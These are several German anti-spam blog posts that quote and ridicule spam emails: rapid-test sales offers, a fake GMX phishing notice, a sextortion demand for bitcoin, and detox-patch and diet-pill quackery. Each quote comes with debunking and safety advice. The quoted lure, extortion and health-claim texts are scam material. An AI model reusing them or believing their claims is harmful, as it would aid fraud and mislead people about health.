Oh, welche Liste beim Paul-Ehrlich-Institut denn? Vielleicht auf der Liste der 46 völlig untauglichen Tests [Archivversion]? Die Verpackung wird sicherlich nach etwas Besserem aussehen, es ist ja nicht so schwierig, eine Druckerei drucken zu lassen. 🏆️

Wie schon gesagt: Spam ist niemals ein gutes Zeichen. Wer mir das nicht glauben möchte, weil ich nur so ein dahergelaufener Blogger bin, der im geduldigen Internet gar vieles behaupten kann, frage doch einfach mal bei der Polizei. Die werden es bestätigen. Die wissen aus ihrer Berufserfahrung, dass Spam illegal, asozial und meist schwer kriminell ist. 👮‍♂️️ ‌ Wenn man in einer Spam alles als Lüge betrachtet, hat man übrigens eine bessere Trefferquote als selbst die besten Coronatests. 😉️ ‌ Und jetzt noch einige weitere Angebote, die ich nicht mehr kommentieren mag:

ExactSignJetzt ab 0,89 € / Stk.**

ExactSign Covid-19 Antigen Schnelltest

Eigenschaften:
– Bfarm: AT1331/21
– Sensititvität: 90%
– Spezifität: 99%
– Erkennt das Virus auch bei geringer Virenlast

– Ideal für Kindergärten, Schulen, Vereine, Hotels, Gastronomie, Friseure, etc.
– Ergebnis nach bereits 10 Minuten
– Schmerzfreie Anwendung

JETZT BESTELLEN!✔️

GeteinJetzt ab 0,94 € / Stk.**

Getein Biotech Covid-19 Antigen Schnelltest

Eigenschaften:
– Bfarm: AT166/20
– Sensititvität: 97,06%
– Spezifität: 98,71%
– Entdeckt auch Mutationen wie die Delta-Variante

– Für Laien geeignet
– Paul-Ehrlich-Institut evaluiert
– CE-Kennzeichnung: CE1434

JETZT BESTELLEN!✔️ ‌‌ HotgenJetzt ab 0,90 € / Stk.**

Sofort lieferbar! Hotgen Covid-19 Antigen Schnelltest

Eigenschaften:
– Bfarm: AT031/20
– Sensititvität: 96,40%
– Spezifität: 99,80%

– Identifizierung des SARS-CoV-2-Nukleokapsid-Antigens
– Lateral-Flow-Immunoassay-Methode
– Ergebnis in 10-15 Minuten

JETZT BESTELLEN!✔️

MedrheinJetzt ab 1,08 € / Stk.**

Sofort lieferbar! Medrhein Anbio Xiamen Antigen Schnelltest

Eigenschaften:
– Bfarm: AT195/21
– Einfach anzuwenden
– Sensitivität 99,27%
– Spezifität 100%

– Empfindlich gegenüber verschiedenen Mutationen
– Erkennt die Delta-Variante
– Als Speichel- oder Lollytest einsetzbar

JETZT BESTELLEN✔️ ‌‌ Schnelltest

Entdecken Sie auch:

Weitere Schnelltests

In unserem Online Shop finden Sie weitere Schnelltests anderer Hersteller.

Zum Shop

*Nach Verfügbarkeit; **Tagespreise können abweichen

Wie gesagt: Ich würde denen nicht einmal glauben, dass sie liefern, was sie zu liefern vorgeben. Das sind Spammer.

Europe Health Assistent Ltd.
81 Skipper Way, Suite 373
St. Neots, England, PE19 6LT

CEO: Warawan Lawadchoo

Natürlich entspricht das nicht den Anforderungen an ein Impressum in einer gewerblichen E-Mail. Darüber hinaus ist das angebliche Unternehmen nicht einmal in Google Maps eingetragen, und das kriegen selbst schlechte Spammer hin.

Außerdem erweckt die angegebene Unternehmensadresse nicht gerade den Eindruck…

Screenshot vom Skipper Way in Google Maps

…als ob in dieser Gegend jemand im größeren Maßstab geschäftlich tätig wäre und einen florierenden Versandhandel für den Schnelltestbedarf Europas betreibt. 😁️

8754624

Krass, eine sinn- und beziehungslose Nummer. Das muss eine echt wichtige Mail sein, sonst wäre da ja keine Nummer drin… 😂️

Aus unserem Verteiler austragen.

Ihr könnt euch auch mal bei mir austragen. Am Arsch!

Wichtig!!! Monday, September 26, 2022 Ausstehende E-Mail-Benachrichtigung

Dienstag, 27. September 2022

Diese E-Mail kommt nicht von GMX. Sie kommt bei GMX-Nutzern an, deren Mailadresse unter Spammern bekannt ist. Es ist Phishing. Der Link führt nicht zu GMX.

Natürlich ist im folgenden Zitat die Mailadresse geändert:

Von: GMX geprüfte E-Mail <ssm2332@knh.biglobe.ne.jp>
An: sag@ich.net

Betreff: Wichtig!!! Monday, September 26, 2022 Ausstehende E-Mail-Benachrichtigung

Sehr geehrte Nutzer [Namensteil der Mailadresse]

Sie haben (9) ausstehende eingehende E-Mails

Klicken Sie hier und melden Sie sich mit Ihrer E-Mail-Adresse sag@ich.net an, um die eingehende Nachricht anzuzeigen

Grußkarten
GMX

gmx.net

So so, „Grußkarten“. 🤣️

Bei so einer lustigen Spam vom Absender „GMX geprüfte E-Mail“, die auf ausstehende eingehende E-Mail-Nachrichten in einer E-Mail hinweist, deren ausstehend eingehende Pracht man aber nicht im gleich E-Mail-Konto sieht, sondern erst nach Klick auf „Click here“ in eine deutschsprachige E-Mail mit englischsprachigem Datum im Betreff – ja, da sollte eigentlich jeder Mensch sofort Zuckungen im Löschfinger haben. 🗑️

Wenn die Hand nicht erstmal im Gesichte klebt. 🤦‍♂️️

Es gibt übrigens keinen Grund, das Tagesdatum in den Betreff zu schreiben. Das Datum steht schon im Mailheader und wird von jeder Mailsoftware menschenlesbar dargestellt. Ist ja keine Sackpost! 😉️

Tatsächlich gibt es nur zwei Arten von E-Mail, bei denen das Tagesdatum im Betreff steht: Spam und Reklame. Leider ist die Formulierung einer Regel dafür schwierig, weil es so viele Möglichkeiten gibt, ein Datum zu schreiben. Ich rate davon ab. Aber man braucht die Mail nicht mehr zu lesen, wenn schon beim Betreff klar ist, dass es sich um E-Müll handelt. Ist ja leider doch immer ein ziemlich voller Posteingang. 🚮️

Aber von solchen klaren Schwächen dieses verdorbenen Köders abgesehen: Es gibt auch viel besseres Phishing. 🎣️

Und deshalb sollte man niemals in eine E-Mail klicken. Einfach die Websites, bei denen man sich immer wieder anmeldet, als Lesezeichen im Browser anlegen und sie nur noch über das Lesezeichen aufrufen! Dann kann einem kein Krimineller einen giftigen Link unterschieben und man kann nicht zum Opfer einer der häufigsten Trickbetrugs-Maschen im heutigen Internet werden. 🛡️

Und das Beste daran: Es ist einfach, benötigt keine zusätzliche Software und kostet nichts. Also macht das bitte! 👍️

Und klickt nie wieder in eine E-Mail! 🖱️🚫️

Wer nach dem Empfang einer derartigen Spam unsicher geworden ist, ruft einfach über sein Browser-Lesezeichen die Website von GMX auf, meldet sich dort ganz normal an und stellt fest, dass das in einer E-Mail behauptete Problem gar nicht existiert. Danach die Mail löschen und sich wieder den angenehmen Dingen im Internet zuwenden! So einfach kann die Abwehr einer dieser gefürchteten „Cyberangriffe“ sein. 🙂️

Diese Spam ist ein Zustecksel meines Lesers A. H.

Re:

Montag, 26. September 2022

Hören diese Erpressungen denn nie auf? 😩️

Vorab: Nichts an den Behauptungen in dieser Spam stimmt. Der Spammer blufft nur. Er hat gar nichts. Auf gar keinen Fall bezahlen und so einem Geschmeiß wie diesem Spammer den Lebensstil finanzieren! Wer mir das nicht glaubt, weil ich nur ein dahergelaufener Blogger bin, der im geduldigen Internet vieles behaupten kann: Einfach bei der Polizei fragen! Aber auf gar keinen Fall diesem Halunken das meist bitter verdiente Geld geben! Man kann Schöneres damit anfangen. 🏖️

Guten Tag!

Genau mein Name! 👍️

Ihr System wurde gehackt mit einem Trojaner-Virus.

Und warum schreibst du mir dann eine Mail, statt deinen Text einfach bei mir auf dem Bildschirm anzuzeigen? Das wäre für mich viel erschreckender und würde deinem Erpressungsversuch viel mehr Rumms geben. 🤔️

Es hat eingedrungen [sic!] auf Ihr Gerät über Portale für Erwachsene die Sie besuchen.
Manche pikante Videos beinhalten den bösartigen Kode [sic!], aktiviert sofort nach dem Einschalten [sic! Eingeschaltete Videos.]. Alle Daten sind bereits kopiert auf meine Server.

Wenn du mir wirklich einen Trojaner auf meinen Rechner gemacht hättest, dann hätte ich nicht deinen asozialen Text im Pesteingang, sondern du hättest mir so ein schönes, kleines Fensterchen aufpoppen lassen:

Messagebox -- Pwned! -- Ich habe deinen Rechner gehackt! -- Ich habe dich beim Pornogucken und Wichsen gefilmt. -- Gib mir dein Geld, sonst mache ich dich zum Internet-Star und zum Gespött deiner Freunde, Verwandten und Kollegen! -- Schau jetzt sofort in deinen Posteingang und befolge die Anweisungen in meiner E-Mail! Du hast nicht mehr viel Zeit. Also beeil dich! -- [OK]

So eine Box aufzumachen ist eher „Hacking für Achtjährige“ als großes Können. Man könnte in einem Shellskript dafür zum Beispiel zenity verwenden. Wenn dein Trojaner auf meinem Rechner liefe, würdest du das tun. Warum? Weil es die Zahlungsbereitschaft steigert. Und du mieser Erpresser lebst ja davon, dass Menschen zahlungsbereit sind. 😐️

Einmal ganz davon abgesehen, dass ich diese „Portale für Erwachsene“ nicht besuche. Wirklich nicht. Aus völligem Desinteresse. Oder weil die kleine schweinsche Perversion, die mich gebieterisch juckend geil macht, dort einfach noch nicht verfügbar ist. Von daher kann ich mir auch keinen „bösartigen Code“ dort geholt haben. 🤭️

Aber wenn du wirklich alle meine Daten kopiert hättest, dann hättest du auch mein komplettes E-Mail-Postfach. Das ist ein Archiv über weit mehr als ein Jahrzehnt. Und mein Name…

$ grep ^From: Sent | sed 1q
From: Elias Schwerdtfeger <sag@ich.net>
$ _

…steht da ganz oft drin¹. Du hättest mich also auf jeden Fall mit etwas anderem als „Guten Tag“ ansprechen können. Warum du das nicht getan hast? Weil alles, was du in deiner Erpresser-Spam erzählst, gelogen ist. 🤥️

Ich behalte vollständige Kontrolle über Ihr Gerät, mit dem Sie das Internet durchsuchen.
Ich sehe Ihren Bildschirm und kann benutzen das Mikrofon und die Kamera ohne Sie das überhaupt bemerken.

Du Vollidiot aus der lodernden Hirnhölle hast noch nicht einmal bemerkt, dass ich keine Kamera und kein Mikrofon an meinem Computer habe. 🤣️

Übrigens aus Gründen. Wie man an deinem schäbigen Erpressungsversuch sieht, schaffen Kamera und Mikrofon sogar einen Angriffsvektor, wenn der Rechner überhaupt nicht gehackt wurde. Deshalb rate ich jedem Menschen dazu, mindestens die Kamera abzukleben, wenn sie im Gerät eingebaut ist. Sogar dieser Obermotz einer asozialen Überwachungs- und Datensammelklitsche, sogar dieser Mark Zuckerberg macht es so. Der weiß auch am genauesten, warum! 😬️

Ich habe bereits eine Bildschirmaufnahme gemacht.
Wir schufen ein Video mit einem pornografischen Rollen [sic!], das Sie sich zu diesem Zeitpunkt angesehen haben und masturbierten.
Ihr Gesicht ist perfekt sichtbar und ich glaube nicht, dass diese Art von Inhalt auf Ihren Ruf positive Wirkung haben wird.

Was ist denn ein pornografisches Rollen? Vielleicht wird hier ja doch noch die passende Perversion für meinen lustlosen Lümmelapparat gefunden. 🤣️

Ich habe vollständigen Zugriff zu Ihrer Kontaktenliste [sic!] und zum Profil in sozialen Netzwerken. Ich kann schicken dieses Video aus Ihrer E- Mail oder den Messengern an alle Welt.

Du unbeholfen lügender Hirni hast nicht einmal meinen Namen, wie man am „Guten Tag“ vortrefflich sieht. 🤥️

Wenn Sie dies vermeiden möchten, dann müssen Sie tun nur einen einfachen Schritt.
Überweisen Sie einfach 1100 USD (US-Dollar) auf die Bitcoin-Wallet:
bc1qv29uyn5zf9nh4n2juk2lcygz5gmuq9■■■■■■■■
(in Bitcoin-Äquivalent zum Wechselkurs auf Zeitpunkt der Überweisung)
Sie können finden detaillierte Anweisungen im Google.

Das scheint ja nicht so gut zu laufen mit deinem Erpressungsversuch. Freut mich. Man kann mit Geld wirklich etwas Schöneres anfangen, als es einem Typen wie dir zu geben. 🌄️

Nach der Zahlung ich werde entfernen das Video und den Virus aus Ihrem Gerät und niemand wird Sie jeweils mehr stören.

Einmal angenommen, deine mies erzählte Story wäre wahr: Warum solltest du das tun? Warum solltest du nicht einfach deine Erpressung fortsetzen? Was du für einen Charakter hast, sieht man doch an deiner Mail. 🤮️

Wenn ich nach Ablauf dieser Frist keine Zahlung erhalte, alle Ihre Daten und die Videos werden öffentlich zugänglich.

Ich gebe Ihnen 2 Werktage.

Ich wurde schon so oft erpresst. Ich habe schon so oft nicht bezahlt und warte seitdem darauf, dass alle meine Freunde und Bekannten mich dafür loben, was für einen wohlgeformten Penis ich habe und wie lustvoll ich ihn zu benutzen verstehe… aber es ist niemals etwas passiert. 😆️

Gut, mir ist es leichtgefallen, nicht darauf reinzufallen, weil ich weder Kamera noch Mikrofon am Rechner habe und auch keine Porno-Websites besuche. Außerdem habe ich genug vertieftes Computer-Grundwissen, um genau zu wissen, was es bedeutet, wenn die Behauptungen des Spammers stimmten. Die bloße Tatsache, dass dieser erpresserische Müll auch bei mir ankommt, belegt, dass nichts hinter diesen Erpressungen steht; dass sämtliche Behauptungen in den einschüchternd formulierten Spams nur Lüge sind. Hier richtet sich ein Arschloch an Ahnungslose, sexuell Verklemmte und sozial Ängstliche ohne technische Kompetenz und nimmt es für seine asoziale „Geschäftsidee“ in Kauf, dass diese Menschen noch zusätzlich verängstigt, in Einzelfällen vielleicht sogar nachhaltig traumatisiert werden. Widerlich! 💩️

Von daher bin ich nicht überrascht, dass niemand bezahlt: Die meisten aus der „Zielgruppe“ des Spammers dürften bereits daran scheitern, sich Bitcoin zu beschaffen und damit umzugehen. 😉️

Ich erhalte eine Benachrichtigung darüber, dass Sie diesen Brief gelesen haben.
Der Zeitgeber startet sofort.

Nicht einmal das stimmt. Es ist kein Zählpixel in der Spam. Selbst, wenn einer drin wäre, würde er von einer guten Mailsoftware nicht automatisch nachgeladen. 🤥️

Allerlei Beschwerden, auch bei der Polizei, wären sinnlos. Mein Bitcoin-Wallet und das E-Mail können nicht verfolgt werden.

Vor allem würde man von der Polizei sofort zu hören bekommen, dass man nicht bezahlen soll, weil die Erpressung völlig substanzlos ist. 👮‍♂️️

Wenn ich erfahre, dass Sie diese Nachricht mit jemandem anderem geteilt haben, das Video wird sofort veröffentlicht.

Hey, Spammer, ich habe drüber gebloggt! Zeig Video! 🤩️

Ich werde Ihren Ruf für immer zerstören und alle Ihre Daten werden öffentlich zugänglich.

Mach mal! Und für öffentlich zugängliche persönliche Daten braucht man gar keine Hacker mehr, das machen schon die Unternehmen. ☹️

Jeder wird von Ihrer Leidenschaft zu Pornoseiten erfahren und mehr. Das Wechseln von Passwörtern wäre auch hilflos, weil alle Daten liegen bereits auf meinen Servern.

Du hast alle meine Daten? Du hast nicht einmal meinen Namen! 🤥️

Vergessen Sie nicht, dass der Ruf ist sehr wichtig [sic!], und seien Sie umsichtig!

Mir reicht es, immer noch einen besseren Ruf als ein schäbiger Erpresser zu haben, der Leute mit Lügengeschichten einschüchtern und dann am Geldbeutel abmelken will. 😂️

Entf! 🗑️

¹Natürlich habe ich die Mailadresse aus meinem Absender für dieses Blogposting verändert. Ich bekomme schon genug Spam.

Die bestens verkauften japanischen Entgiftungspflaster sind ab sofort wieder auf Lager

Sonntag, 25. September 2022

Mancher Bullshit kommt auch immer wieder! 💩️

Diese Spam wurde natürlich nicht aus Japan, sondern über eine russische IP versendet, und das angepriesene Produkt ist völlig wirkungslose Quacksalberei. Mit dem Geld, das man dafür ausgibt, kann man etwas Besseres anfangen.

Aber jetzt erstmal die erschröckliche Nachricht der Spammer: Mein Körper ist voller „Verunreinigungen“ – schön, dass ihnen mal ein weniger reißerisches Wort als „Gifte“ eingefallen ist – von denen die Medizin gar nichts weiß. Die aufgezählten „Symptome“ für diesen Schmutz im Körper sind natürlich so ausgewählt, das vermutlich jeder Mensch davon betroffen ist:

Is this email not displaying correctly? View it in your browser..

HERE

BLACK FRIDAY SALE -70% OFF -- Die bestens verkauften japanischen Entgiftungspflaster sind ab sofort wieder auf Lager -- Wissen sie, dass ihr Körper voller Verunreinigungen ist? -- Anzeichen für Verunreinigungsansammlungen -- Konzentrationsschwäche -- Gereiztheit -- Hautprobleme -- Muskelbeschwerden -- Körpergeruch -- Schlaflosigkeit -- Kopfschmerzen -- Erschöpfung -- Verbessern Sie Ihre körperliche und geistige Gesundheit mit einer komplett natürlichen japanischen Lösung! -- Erhalten sie 70% Rabatt

,
Don’t like these emails? Unsubscribe.

Ja, „Körpergeruch“ habe ich. 🤭️

Und „Gereiztheit“ habe ich auch, und zwar jedes Mal, nachdem ich einen Blick in die aussortierte Spam geworfen habe. 😡️

Wie gesagt: Hier ist jeder vergiftet. Und das Pseudomedikament, das dieser kriminelle Quacksalber und Beutelschneider aus dem Spameingang verkaufen will, funktioniert überhaupt nicht gegen eine solche eingeredete „Krankheit“, was aber nichts macht, weil die eingeredete „Krankheit“ ja auch nur eingeredet ist. Alles, was man noch über die japanischen Heilstein-Essig-Pflaster für die Füße wissen müsste, habe ich bereits vor fünf Jahren anlässlich einer unfassbar dummen und epischen Briefkastenspam für alte Leute in größter Ausführlichkeit geschrieben, so dass ich es hier nicht wiederholen möchte. Es ist ja auch immer noch gut. ♻️

Power Shape Macht Dich Schlank wie ein Model nach 1 Kur!

Sonntag, 25. September 2022

Oh, heute scheint der internationale Tag des Quacksalbers zu sein. 😐️

*|MC_PREVIEW_TEXT|*

Ach, ihr kapiert euer Spamskript immer noch nicht? 🤭️

Schauen Sie sich diese Mail in Ihrem Browser an

Aber ich sehe die Mail doch schon in einem gut für die Darstellung von E-Mail geeigneten Programm! 🤦‍♂️️

So, jetzt kommt Qualitätsdeutsch:

Schnell und effektiv abnehmen mit PowerShape!

PowerShape ist eine neue und sichere Methode der Abnahme. PowerShape blockiert effektiv die Aufnahme Fette und Kohlenhydrate in ihrem Körper.

Wenn die Aufnahme von Fetten und Kohlenhydraten in meinem Körper effektiv blockiert wird, hat das vor allem eine Folge: Ich kann essen, so viel ich will und bekomme doch intensive Hungergefühle. Ich weiß ja nicht, ob diese Anpreisung eine gute Reklame ist. 😁️

Eines der wichtigsten Elemente des Produkts ist Garcinia Cambogia. Es bildet ein Gel im Magen verhindert, dass externe Kohlehydrate und Fette aus. Also, ihr Körper hat keine andere Wahl als ihre eigenen Fettdepots zu verwenden. Das ist, wie sie Fett schnell und sogar verlieren ohne Änderung ihrer Diät.

JETZT POWERSHAPE BESTELLEN

Eines der wichtigsten Elemente in Quacksalber-Spam ist gigantische Dummheit. Sie bildet ein Fluff im Hirn verhindert, dass Nachschlagen und Lesen vor Kauf. Also, ihr Resthirn hat keine andere Wahl als ihre eigenen Geldbeutel zu verwenden, um Spampillen zu kaufen. Das ist, wie sie Geld schnell und sogar verlieren ohne Änderung ihrer Bildung.

Schon eine einfache Websuche nach dem Wirkstoffnamen liefert – wenn man drei Seiten SEO-optimierten Google-Spam-Dreck auf irgendwelchen Verkaufsseiten mit pseudojournalistischen Quatschtexten ignoriert – sehr leicht einen Artikel über Garcinia Cambogia bei MedWatch. Ich zitiere: „Klingt zu schön, um wahr zu sein? Stimmt. Nicht nur, dass es den erwähnten Professor Adrian Meyer nicht gibt. Auch zu den wichtigsten Inhaltsstoffen des angeblich schlankmachenden Wunders – die Garcinia Cambogia Frucht und die im Harfenstrauch vorkommenden chemische Verbindung Forskolin – gibt es wenig belastbare Studien. Schnell stößt man in Literaturdatenbanken jedoch über hiermit verbundene Lebererkrankungen, die teils eine Transplantation nötig machen“. 😮️

Da müssen andere Menschen viele Jahre Alkohol in sich reinkippen oder ein paar Monate lang jeden Tag ihr Paracetamol gegen die Schmerzen höher dosieren, bis die Leber schließlich so kaputt ist – gut, dass einem solche Umwege dank der Spam-Quacksalber an der Schlankheitsfront erspart bleiben. Übrigens: Wenn keine Spenderleber verfügbar ist und man deshalb stirbt, führt das auch zu einer schnellen Gewichtsabnahme. Allerdings ist es einem dann egal. ⚰️

Immerhin haben sich die Quacksalber mit ihrem „verhindert die Aufnahme von Nährstoffen im Magen“ mal eine bessere Lüge ausgedacht als in ihren früheren Kampagnen, die absonderlichste Behauptungen aufgestellt haben: „In schlecht übersetztem Deutsch wird über viele Absätze von dem schlankmachenden Wunder fabuliert, dessen wichtigsten Inhaltsstoffe aus der Garcinia Cambogia Frucht und der im Harfenstrauch vorkommenden chemischen Verbindung Forskolin stammen sollen […] Dank des Mittels werden Toxine gefangen und „Cholesterinlappen“ abgerissen, heißt es in der wissenschaftlich völlig unbelegten Werbung. Dank einzigartiger Substanzen verbrenne das Präparat Fett, senke dabei gleichzeitig den Cholesterinspiegel und reinige Blutgefäße“. 🚽️

Eines ist konstant geblieben, wie man auch an der Spam sieht: Das schlecht übersetzte Deutsch. 🤭️

Aber hauptsache, mit Medikamenten kennen sich die Spammer aus! 💊️💀️